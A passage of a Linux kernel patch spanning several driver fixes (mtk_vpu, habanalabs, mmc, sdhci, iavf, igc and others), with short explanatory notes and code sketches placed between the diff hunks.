++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+@@ -562,15 +562,17 @@ static int load_requested_vpu(struct mtk_vpu *vpu,
+ int vpu_load_firmware(struct platform_device *pdev)
+ {
+ 	struct mtk_vpu *vpu;
+-	struct device *dev = &pdev->dev;
++	struct device *dev;
+ 	struct vpu_run *run;
+ 	int ret;
+ 
+ 	if (!pdev) {
+-		dev_err(dev, "VPU platform device is invalid\n");
++		pr_err("VPU platform device is invalid\n");
+ 		return -EINVAL;
+ 	}
+ 
++	dev = &pdev->dev;
++
+ 	vpu = platform_get_drvdata(pdev);
+ 	run = &vpu->run;
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe.c b/drivers/media/platform/qcom/camss/camss-vfe.c
+index a26e4a5d87b6b..d8cd9b09c20de 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe.c
+@@ -1540,7 +1540,11 @@ int msm_vfe_register_entities(struct vfe_device *vfe,
+ 		}
+ 
+ 		video_out->ops = &vfe->video_ops;
+-		video_out->bpl_alignment = 8;
++		if (vfe->camss->version == CAMSS_845 ||
++		    vfe->camss->version == CAMSS_8250)
++			video_out->bpl_alignment = 16;
++		else
++			video_out->bpl_alignment = 8;
+ 		video_out->line_based = 0;
+ 		if (i == VFE_LINE_PIX) {
+ 			video_out->bpl_alignment = 16;
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index e0dca445abf14..9ee1b6abd8a05 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -870,6 +870,18 @@ static void device_early_fini(struct hl_device *hdev)
+ 		hdev->asic_funcs->early_fini(hdev);
+ }
+ 
++static bool is_pci_link_healthy(struct hl_device *hdev)
++{
++	u16 vendor_id;
++
++	if (!hdev->pdev)
++		return false;
++
++	pci_read_config_word(hdev->pdev, PCI_VENDOR_ID, &vendor_id);
++
++	return (vendor_id == PCI_VENDOR_ID_HABANALABS);
++}
++
+ static void hl_device_heartbeat(struct work_struct *work)
+ {
+ 	struct hl_device *hdev = container_of(work, struct hl_device,
+@@ -882,7 +894,8 @@ static void hl_device_heartbeat(struct work_struct *work)
+ 		goto reschedule;
+ 
+ 	if (hl_device_operational(hdev, NULL))
+-		dev_err(hdev->dev, "Device heartbeat failed!\n");
++		dev_err(hdev->dev, "Device heartbeat failed! PCI link is %s\n",
++			is_pci_link_healthy(hdev) ? "healthy" : "broken");
+ 
+ 	hl_device_reset(hdev, HL_DRV_RESET_HARD | HL_DRV_RESET_HEARTBEAT);
+ 
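
The new helper works because configuration reads on a dead PCIe link complete with all-ones data, so the vendor ID register returns 0xFFFF instead of the expected ID. A stripped-down sketch of the same probe for an arbitrary device (pci_link_alive is a hypothetical name):

#include <linux/pci.h>

static bool pci_link_alive(struct pci_dev *pdev, u16 expected_vendor)
{
	u16 vendor_id;

	if (pci_read_config_word(pdev, PCI_VENDOR_ID, &vendor_id))
		return false;

	/* A broken link reads as 0xFFFF, never a real vendor ID. */
	return vendor_id == expected_vendor;
}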
+diff --git a/drivers/misc/habanalabs/common/habanalabs.h b/drivers/misc/habanalabs/common/habanalabs.h
+index 58c95b13be69a..257b94cec6248 100644
+--- a/drivers/misc/habanalabs/common/habanalabs.h
++++ b/drivers/misc/habanalabs/common/habanalabs.h
+@@ -34,6 +34,8 @@
+ struct hl_device;
+ struct hl_fpriv;
+ 
++#define PCI_VENDOR_ID_HABANALABS	0x1da3
++
+ /* Use upper bits of mmap offset to store habana driver specific information.
+  * bits[63:59] - Encode mmap type
+  * bits[45:0]  - mmap offset value
+diff --git a/drivers/misc/habanalabs/common/habanalabs_drv.c b/drivers/misc/habanalabs/common/habanalabs_drv.c
+index 112632afe7d53..ae3cab3f4aa55 100644
+--- a/drivers/misc/habanalabs/common/habanalabs_drv.c
++++ b/drivers/misc/habanalabs/common/habanalabs_drv.c
+@@ -54,8 +54,6 @@ module_param(boot_error_status_mask, ulong, 0444);
+ MODULE_PARM_DESC(boot_error_status_mask,
+ 	"Mask of the error status during device CPU boot (If bitX is cleared then error X is masked. Default all 1's)");
+ 
+-#define PCI_VENDOR_ID_HABANALABS	0x1da3
+-
+ #define PCI_IDS_GOYA			0x0001
+ #define PCI_IDS_GAUDI			0x1000
+ #define PCI_IDS_GAUDI_SEC		0x1010
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 498333b769fdb..cdd7f126d4aea 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -2097,14 +2097,14 @@ static void mmc_blk_mq_poll_completion(struct mmc_queue *mq,
+ 	mmc_blk_urgent_bkops(mq, mqrq);
+ }
+ 
+-static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, struct request *req)
++static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, enum mmc_issue_type issue_type)
+ {
+ 	unsigned long flags;
+ 	bool put_card;
+ 
+ 	spin_lock_irqsave(&mq->lock, flags);
+ 
+-	mq->in_flight[mmc_issue_type(mq, req)] -= 1;
++	mq->in_flight[issue_type] -= 1;
+ 
+ 	put_card = (mmc_tot_in_flight(mq) == 0);
+ 
+@@ -2117,6 +2117,7 @@ static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, struct request *req)
+ static void mmc_blk_mq_post_req(struct mmc_queue *mq, struct request *req,
+ 				bool can_sleep)
+ {
++	enum mmc_issue_type issue_type = mmc_issue_type(mq, req);
+ 	struct mmc_queue_req *mqrq = req_to_mmc_queue_req(req);
+ 	struct mmc_request *mrq = &mqrq->brq.mrq;
+ 	struct mmc_host *host = mq->card->host;
+@@ -2136,7 +2137,7 @@ static void mmc_blk_mq_post_req(struct mmc_queue *mq, struct request *req,
+ 			blk_mq_complete_request(req);
+ 	}
+ 
+-	mmc_blk_mq_dec_in_flight(mq, req);
++	mmc_blk_mq_dec_in_flight(mq, issue_type);
+ }
+ 
+ void mmc_blk_mq_recovery(struct mmc_queue *mq)
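
The mmc fix is a lifetime rule: once blk_mq_complete_request() has run, the request may be recycled, so nothing may be derived from it afterwards. Capturing mmc_issue_type() into a local first, as the hunk does, is the general snapshot-before-release pattern; distilled to its core it looks like this (simplified from the function above, not the full implementation):

static void demo_post_req(struct mmc_queue *mq, struct request *req)
{
	/* Derive everything needed from 'req' while it is still ours. */
	enum mmc_issue_type issue_type = mmc_issue_type(mq, req);

	blk_mq_complete_request(req);	/* 'req' may be freed after this */

	/* Only the snapshot is used from here on. */
	mmc_blk_mq_dec_in_flight(mq, issue_type);
}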
+diff --git a/drivers/mmc/host/sdhci_f_sdh30.c b/drivers/mmc/host/sdhci_f_sdh30.c
+index 6c4f43e112826..7ede74bf37230 100644
+--- a/drivers/mmc/host/sdhci_f_sdh30.c
++++ b/drivers/mmc/host/sdhci_f_sdh30.c
+@@ -26,9 +26,16 @@ struct f_sdhost_priv {
+ 	bool enable_cmd_dat_delay;
+ };
+ 
++static void *sdhci_f_sdhost_priv(struct sdhci_host *host)
++{
++	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
++
++	return sdhci_pltfm_priv(pltfm_host);
++}
++
+ static void sdhci_f_sdh30_soft_voltage_switch(struct sdhci_host *host)
+ {
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
+ 	u32 ctrl = 0;
+ 
+ 	usleep_range(2500, 3000);
+@@ -61,7 +68,7 @@ static unsigned int sdhci_f_sdh30_get_min_clock(struct sdhci_host *host)
+ 
+ static void sdhci_f_sdh30_reset(struct sdhci_host *host, u8 mask)
+ {
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
+ 	u32 ctl;
+ 
+ 	if (sdhci_readw(host, SDHCI_CLOCK_CONTROL) == 0)
+@@ -85,30 +92,32 @@ static const struct sdhci_ops sdhci_f_sdh30_ops = {
+ 	.set_uhs_signaling = sdhci_set_uhs_signaling,
+ };
+ 
++static const struct sdhci_pltfm_data sdhci_f_sdh30_pltfm_data = {
++	.ops = &sdhci_f_sdh30_ops,
++	.quirks = SDHCI_QUIRK_NO_ENDATTR_IN_NOPDESC
++		| SDHCI_QUIRK_INVERTED_WRITE_PROTECT,
++	.quirks2 = SDHCI_QUIRK2_SUPPORT_SINGLE
++		|  SDHCI_QUIRK2_TUNING_WORK_AROUND,
++};
++
+ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ {
+ 	struct sdhci_host *host;
+ 	struct device *dev = &pdev->dev;
+-	int irq, ctrl = 0, ret = 0;
++	int ctrl = 0, ret = 0;
+ 	struct f_sdhost_priv *priv;
++	struct sdhci_pltfm_host *pltfm_host;
+ 	u32 reg = 0;
+ 
+-	irq = platform_get_irq(pdev, 0);
+-	if (irq < 0)
+-		return irq;
+-
+-	host = sdhci_alloc_host(dev, sizeof(struct f_sdhost_priv));
++	host = sdhci_pltfm_init(pdev, &sdhci_f_sdh30_pltfm_data,
++				sizeof(struct f_sdhost_priv));
+ 	if (IS_ERR(host))
+ 		return PTR_ERR(host);
+ 
+-	priv = sdhci_priv(host);
++	pltfm_host = sdhci_priv(host);
++	priv = sdhci_pltfm_priv(pltfm_host);
+ 	priv->dev = dev;
+ 
+-	host->quirks = SDHCI_QUIRK_NO_ENDATTR_IN_NOPDESC |
+-		       SDHCI_QUIRK_INVERTED_WRITE_PROTECT;
+-	host->quirks2 = SDHCI_QUIRK2_SUPPORT_SINGLE |
+-			SDHCI_QUIRK2_TUNING_WORK_AROUND;
+-
+ 	priv->enable_cmd_dat_delay = device_property_read_bool(dev,
+ 						"fujitsu,cmd-dat-delay-select");
+ 
+@@ -116,18 +125,6 @@ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err;
+ 
+-	platform_set_drvdata(pdev, host);
+-
+-	host->hw_name = "f_sdh30";
+-	host->ops = &sdhci_f_sdh30_ops;
+-	host->irq = irq;
+-
+-	host->ioaddr = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(host->ioaddr)) {
+-		ret = PTR_ERR(host->ioaddr);
+-		goto err;
+-	}
+-
+ 	if (dev_of_node(dev)) {
+ 		sdhci_get_of_property(pdev);
+ 
+@@ -182,23 +179,22 @@ err_add_host:
+ err_clk:
+ 	clk_disable_unprepare(priv->clk_iface);
+ err:
+-	sdhci_free_host(host);
++	sdhci_pltfm_free(pdev);
++
+ 	return ret;
+ }
+ 
+ static int sdhci_f_sdh30_remove(struct platform_device *pdev)
+ {
+ 	struct sdhci_host *host = platform_get_drvdata(pdev);
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
+-
+-	sdhci_remove_host(host, readl(host->ioaddr + SDHCI_INT_STATUS) ==
+-			  0xffffffff);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
++	struct clk *clk_iface = priv->clk_iface;
++	struct clk *clk = priv->clk;
+ 
+-	clk_disable_unprepare(priv->clk_iface);
+-	clk_disable_unprepare(priv->clk);
++	sdhci_pltfm_unregister(pdev);
+ 
+-	sdhci_free_host(host);
+-	platform_set_drvdata(pdev, NULL);
++	clk_disable_unprepare(clk_iface);
++	clk_disable_unprepare(clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/wbsd.c b/drivers/mmc/host/wbsd.c
+index 7c7ec8d10232b..b5b1a42ca25e1 100644
+--- a/drivers/mmc/host/wbsd.c
++++ b/drivers/mmc/host/wbsd.c
+@@ -1705,8 +1705,6 @@ static int wbsd_init(struct device *dev, int base, int irq, int dma,
+ 
+ 		wbsd_release_resources(host);
+ 		wbsd_free_mmc(dev);
+-
+-		mmc_free_host(mmc);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index b69bd44ada1f2..a73008b9e0b3c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3006,6 +3006,14 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 
+ 	/* If there is a GPIO connected to the reset pin, toggle it */
+ 	if (gpiod) {
++		/* If the switch has just been reset and not yet completed
++		 * loading EEPROM, the reset may interrupt the I2C transaction
++		 * mid-byte, causing the first EEPROM read after the reset
++		 * to come from the wrong location, leaving the switch booted
++		 * into the wrong mode and inoperable.
++		 */
++		mv88e6xxx_g1_wait_eeprom_done(chip);
++
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index abd6cc0cd641f..5fb991835078a 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -5070,6 +5070,9 @@ static int __maybe_unused macb_suspend(struct device *dev)
+ 	unsigned int q;
+ 	int err;
+ 
++	if (!device_may_wakeup(&bp->dev->dev))
++		phy_exit(bp->sgmii_phy);
++
+ 	if (!netif_running(netdev))
+ 		return 0;
+ 
+@@ -5130,7 +5133,6 @@ static int __maybe_unused macb_suspend(struct device *dev)
+ 	if (!(bp->wol & MACB_WOL_ENABLED)) {
+ 		rtnl_lock();
+ 		phylink_stop(bp->phylink);
+-		phy_exit(bp->sgmii_phy);
+ 		rtnl_unlock();
+ 		spin_lock_irqsave(&bp->lock, flags);
+ 		macb_reset_hw(bp);
+@@ -5160,6 +5162,9 @@ static int __maybe_unused macb_resume(struct device *dev)
+ 	unsigned int q;
+ 	int err;
+ 
++	if (!device_may_wakeup(&bp->dev->dev))
++		phy_init(bp->sgmii_phy);
++
+ 	if (!netif_running(netdev))
+ 		return 0;
+ 
+@@ -5220,8 +5225,6 @@ static int __maybe_unused macb_resume(struct device *dev)
+ 	macb_set_rx_mode(netdev);
+ 	macb_restore_features(bp);
+ 	rtnl_lock();
+-	if (!device_may_wakeup(&bp->dev->dev))
+-		phy_init(bp->sgmii_phy);
+ 
+ 	phylink_start(bp->phylink);
+ 	rtnl_unlock();
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 17e3f26eee4a4..779ba907009a5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -210,11 +210,11 @@ read_nvm_exit:
+  * @hw: pointer to the HW structure.
+  * @module_pointer: module pointer location in words from the NVM beginning
+  * @offset: offset in words from module start
+- * @words: number of words to write
+- * @data: buffer with words to write to the Shadow RAM
++ * @words: number of words to read
++ * @data: buffer to store the words read from the Shadow RAM
+  * @last_command: tells the AdminQ that this is the last command
+  *
+- * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
++ * Reads a buffer of 16 bit words from the Shadow RAM using the admin command.
+  **/
+ static int i40e_read_nvm_aq(struct i40e_hw *hw,
+ 			    u8 module_pointer, u32 offset,
+@@ -234,18 +234,18 @@ static int i40e_read_nvm_aq(struct i40e_hw *hw,
+ 	 */
+ 	if ((offset + words) > hw->nvm.sr_size)
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write error: offset %d beyond Shadow RAM limit %d\n",
++			   "NVM read error: offset %d beyond Shadow RAM limit %d\n",
+ 			   (offset + words), hw->nvm.sr_size);
+ 	else if (words > I40E_SR_SECTOR_SIZE_IN_WORDS)
+-		/* We can write only up to 4KB (one sector), in one AQ write */
++		/* We can read only up to 4KB (one sector), in one AQ read */
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write fail error: tried to write %d words, limit is %d.\n",
++			   "NVM read fail error: tried to read %d words, limit is %d.\n",
+ 			   words, I40E_SR_SECTOR_SIZE_IN_WORDS);
+ 	else if (((offset + (words - 1)) / I40E_SR_SECTOR_SIZE_IN_WORDS)
+ 		 != (offset / I40E_SR_SECTOR_SIZE_IN_WORDS))
+-		/* A single write cannot spread over two sectors */
++		/* A single read cannot spread over two sectors */
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "NVM write error: cannot spread over two sectors in a single write offset=%d words=%d\n",
++			   "NVM read error: cannot spread over two sectors in a single read offset=%d words=%d\n",
+ 			   offset, words);
+ 	else
+ 		ret_code = i40e_aq_read_nvm(hw, module_pointer,
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index f544d2b0abdbd..fe912b1c468ef 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1289,6 +1289,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.src_port = fsp->m_u.tcp_ip4_spec.psrc;
+ 		fltr->ip_mask.dst_port = fsp->m_u.tcp_ip4_spec.pdst;
+ 		fltr->ip_mask.tos = fsp->m_u.tcp_ip4_spec.tos;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case AH_V4_FLOW:
+ 	case ESP_V4_FLOW:
+@@ -1300,6 +1301,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.v4_addrs.dst_ip = fsp->m_u.ah_ip4_spec.ip4dst;
+ 		fltr->ip_mask.spi = fsp->m_u.ah_ip4_spec.spi;
+ 		fltr->ip_mask.tos = fsp->m_u.ah_ip4_spec.tos;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case IPV4_USER_FLOW:
+ 		fltr->ip_data.v4_addrs.src_ip = fsp->h_u.usr_ip4_spec.ip4src;
+@@ -1312,6 +1314,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.l4_header = fsp->m_u.usr_ip4_spec.l4_4_bytes;
+ 		fltr->ip_mask.tos = fsp->m_u.usr_ip4_spec.tos;
+ 		fltr->ip_mask.proto = fsp->m_u.usr_ip4_spec.proto;
++		fltr->ip_ver = 4;
+ 		break;
+ 	case TCP_V6_FLOW:
+ 	case UDP_V6_FLOW:
+@@ -1330,6 +1333,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.src_port = fsp->m_u.tcp_ip6_spec.psrc;
+ 		fltr->ip_mask.dst_port = fsp->m_u.tcp_ip6_spec.pdst;
+ 		fltr->ip_mask.tclass = fsp->m_u.tcp_ip6_spec.tclass;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case AH_V6_FLOW:
+ 	case ESP_V6_FLOW:
+@@ -1345,6 +1349,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		       sizeof(struct in6_addr));
+ 		fltr->ip_mask.spi = fsp->m_u.ah_ip6_spec.spi;
+ 		fltr->ip_mask.tclass = fsp->m_u.ah_ip6_spec.tclass;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case IPV6_USER_FLOW:
+ 		memcpy(&fltr->ip_data.v6_addrs.src_ip, fsp->h_u.usr_ip6_spec.ip6src,
+@@ -1361,6 +1366,7 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		fltr->ip_mask.l4_header = fsp->m_u.usr_ip6_spec.l4_4_bytes;
+ 		fltr->ip_mask.tclass = fsp->m_u.usr_ip6_spec.tclass;
+ 		fltr->ip_mask.proto = fsp->m_u.usr_ip6_spec.l4_proto;
++		fltr->ip_ver = 6;
+ 		break;
+ 	case ETHER_FLOW:
+ 		fltr->eth_data.etype = fsp->h_u.ether_spec.h_proto;
+@@ -1371,6 +1377,10 @@ iavf_add_fdir_fltr_info(struct iavf_adapter *adapter, struct ethtool_rx_flow_spe
+ 		return -EINVAL;
+ 	}
+ 
++	err = iavf_validate_fdir_fltr_masks(adapter, fltr);
++	if (err)
++		return err;
++
+ 	if (iavf_fdir_is_dup_fltr(adapter, fltr))
+ 		return -EEXIST;
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.c b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+index 505e82ebafe47..03e774bd2a5b4 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+@@ -18,6 +18,79 @@ static const struct in6_addr ipv6_addr_full_mask = {
+ 	}
+ };
+ 
++static const struct in6_addr ipv6_addr_zero_mask = {
++	.in6_u = {
++		.u6_addr8 = {
++			0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++		}
++	}
++};
++
++/**
++ * iavf_validate_fdir_fltr_masks - validate Flow Director filter fields masks
++ * @adapter: pointer to the VF adapter structure
++ * @fltr: Flow Director filter data structure
++ *
++ * Returns 0 if every packet field mask is either full or empty. Returns
++ * an error if at least one mask is partial.
++ */
++int iavf_validate_fdir_fltr_masks(struct iavf_adapter *adapter,
++				  struct iavf_fdir_fltr *fltr)
++{
++	if (fltr->eth_mask.etype && fltr->eth_mask.etype != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_ver == 4) {
++		if (fltr->ip_mask.v4_addrs.src_ip &&
++		    fltr->ip_mask.v4_addrs.src_ip != htonl(U32_MAX))
++			goto partial_mask;
++
++		if (fltr->ip_mask.v4_addrs.dst_ip &&
++		    fltr->ip_mask.v4_addrs.dst_ip != htonl(U32_MAX))
++			goto partial_mask;
++
++		if (fltr->ip_mask.tos && fltr->ip_mask.tos != U8_MAX)
++			goto partial_mask;
++	} else if (fltr->ip_ver == 6) {
++		if (memcmp(&fltr->ip_mask.v6_addrs.src_ip, &ipv6_addr_zero_mask,
++			   sizeof(struct in6_addr)) &&
++		    memcmp(&fltr->ip_mask.v6_addrs.src_ip, &ipv6_addr_full_mask,
++			   sizeof(struct in6_addr)))
++			goto partial_mask;
++
++		if (memcmp(&fltr->ip_mask.v6_addrs.dst_ip, &ipv6_addr_zero_mask,
++			   sizeof(struct in6_addr)) &&
++		    memcmp(&fltr->ip_mask.v6_addrs.dst_ip, &ipv6_addr_full_mask,
++			   sizeof(struct in6_addr)))
++			goto partial_mask;
++
++		if (fltr->ip_mask.tclass && fltr->ip_mask.tclass != U8_MAX)
++			goto partial_mask;
++	}
++
++	if (fltr->ip_mask.proto && fltr->ip_mask.proto != U8_MAX)
++		goto partial_mask;
++
++	if (fltr->ip_mask.src_port && fltr->ip_mask.src_port != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.dst_port && fltr->ip_mask.dst_port != htons(U16_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.spi && fltr->ip_mask.spi != htonl(U32_MAX))
++		goto partial_mask;
++
++	if (fltr->ip_mask.l4_header &&
++	    fltr->ip_mask.l4_header != htonl(U32_MAX))
++		goto partial_mask;
++
++	return 0;
++
++partial_mask:
++	dev_err(&adapter->pdev->dev, "Failed to add Flow Director filter, partial masks are not supported\n");
++	return -EOPNOTSUPP;
++}
++
+ /**
+  * iavf_pkt_udp_no_pay_len - the length of UDP packet without payload
+  * @fltr: Flow Director filter data structure
+@@ -263,8 +336,6 @@ iavf_fill_fdir_ip4_hdr(struct iavf_fdir_fltr *fltr,
+ 		VIRTCHNL_ADD_PROTO_HDR_FIELD_BIT(hdr, IPV4, DST);
+ 	}
+ 
+-	fltr->ip_ver = 4;
+-
+ 	return 0;
+ }
+ 
+@@ -309,8 +380,6 @@ iavf_fill_fdir_ip6_hdr(struct iavf_fdir_fltr *fltr,
+ 		VIRTCHNL_ADD_PROTO_HDR_FIELD_BIT(hdr, IPV6, DST);
+ 	}
+ 
+-	fltr->ip_ver = 6;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.h b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+index 33c55c366315b..9eb9f73f6adf3 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+@@ -110,6 +110,8 @@ struct iavf_fdir_fltr {
+ 	struct virtchnl_fdir_add vc_add_msg;
+ };
+ 
++int iavf_validate_fdir_fltr_masks(struct iavf_adapter *adapter,
++				  struct iavf_fdir_fltr *fltr);
+ int iavf_fill_fdir_add_msg(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+ void iavf_print_fdir_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr);
+diff --git a/drivers/net/ethernet/intel/ice/ice_eswitch.c b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+index f9f15acae90a0..2ffe5708a045b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_eswitch.c
++++ b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+@@ -562,6 +562,12 @@ ice_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 		break;
+ 	case DEVLINK_ESWITCH_MODE_SWITCHDEV:
+ 	{
++		if (ice_is_adq_active(pf)) {
++			dev_err(ice_pf_to_dev(pf), "Couldn't change eswitch mode to switchdev - ADQ is active. Delete ADQ configs and try again, e.g. tc qdisc del dev $PF root");
++			NL_SET_ERR_MSG_MOD(extack, "Couldn't change eswitch mode to switchdev - ADQ is active. Delete ADQ configs and try again, e.g. tc qdisc del dev $PF root");
++			return -EOPNOTSUPP;
++		}
++
+ 		dev_info(ice_pf_to_dev(pf), "PF %d changed eswitch mode to switchdev",
+ 			 pf->hw.pf_id);
+ 		NL_SET_ERR_MSG_MOD(extack, "Changed eswitch mode to switchdev");
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index a771e597795d3..7a00d297be3a9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -8787,6 +8787,11 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 						  ice_setup_tc_block_cb,
+ 						  np, np, true);
+ 	case TC_SETUP_QDISC_MQPRIO:
++		if (ice_is_eswitch_mode_switchdev(pf)) {
++			netdev_err(netdev, "TC MQPRIO offload not supported, switchdev is enabled\n");
++			return -EOPNOTSUPP;
++		}
++
+ 		if (pf->adev) {
+ 			mutex_lock(&pf->adev_mutex);
+ 			device_lock(&pf->adev->dev);
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.h b/drivers/net/ethernet/intel/igc/igc_base.h
+index ce530f5fd7bda..52849f5e8048d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.h
++++ b/drivers/net/ethernet/intel/igc/igc_base.h
+@@ -85,8 +85,13 @@ union igc_adv_rx_desc {
+ #define IGC_RXDCTL_SWFLUSH		0x04000000 /* Receive Software Flush */
+ 
+ /* SRRCTL bit definitions */
+-#define IGC_SRRCTL_BSIZEPKT_SHIFT		10 /* Shift _right_ */
+-#define IGC_SRRCTL_BSIZEHDRSIZE_SHIFT		2  /* Shift _left_ */
+-#define IGC_SRRCTL_DESCTYPE_ADV_ONEBUF	0x02000000
++#define IGC_SRRCTL_BSIZEPKT_MASK	GENMASK(6, 0)
++#define IGC_SRRCTL_BSIZEPKT(x)		FIELD_PREP(IGC_SRRCTL_BSIZEPKT_MASK, \
++					(x) / 1024) /* in 1 KB resolution */
++#define IGC_SRRCTL_BSIZEHDR_MASK	GENMASK(13, 8)
++#define IGC_SRRCTL_BSIZEHDR(x)		FIELD_PREP(IGC_SRRCTL_BSIZEHDR_MASK, \
++					(x) / 64) /* in 64 bytes resolution */
++#define IGC_SRRCTL_DESCTYPE_MASK	GENMASK(27, 25)
++#define IGC_SRRCTL_DESCTYPE_ADV_ONEBUF	FIELD_PREP(IGC_SRRCTL_DESCTYPE_MASK, 1)
+ 
+ #endif /* _IGC_BASE_H */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index d877dc0f87f71..2f3947cf513bd 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -675,8 +675,11 @@ static void igc_configure_rx_ring(struct igc_adapter *adapter,
+ 	else
+ 		buf_size = IGC_RXBUFFER_2048;
+ 
+-	srrctl = IGC_RX_HDR_LEN << IGC_SRRCTL_BSIZEHDRSIZE_SHIFT;
+-	srrctl |= buf_size >> IGC_SRRCTL_BSIZEPKT_SHIFT;
++	srrctl = rd32(IGC_SRRCTL(reg_idx));
++	srrctl &= ~(IGC_SRRCTL_BSIZEPKT_MASK | IGC_SRRCTL_BSIZEHDR_MASK |
++		    IGC_SRRCTL_DESCTYPE_MASK);
++	srrctl |= IGC_SRRCTL_BSIZEHDR(IGC_RX_HDR_LEN);
++	srrctl |= IGC_SRRCTL_BSIZEPKT(buf_size);
+ 	srrctl |= IGC_SRRCTL_DESCTYPE_ADV_ONEBUF;
+ 
+ 	wr32(IGC_SRRCTL(reg_idx), srrctl);
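
The igc rework trades hand-maintained shift constants for GENMASK()/FIELD_PREP() and switches to read-modify-write so unrelated SRRCTL fields are preserved. The macro pair composes like this (hypothetical register layout, not igc's):

#include <linux/bitfield.h>
#include <linux/bits.h>

#define DEMO_FIELD_A	GENMASK(6, 0)	/* bits 6:0  */
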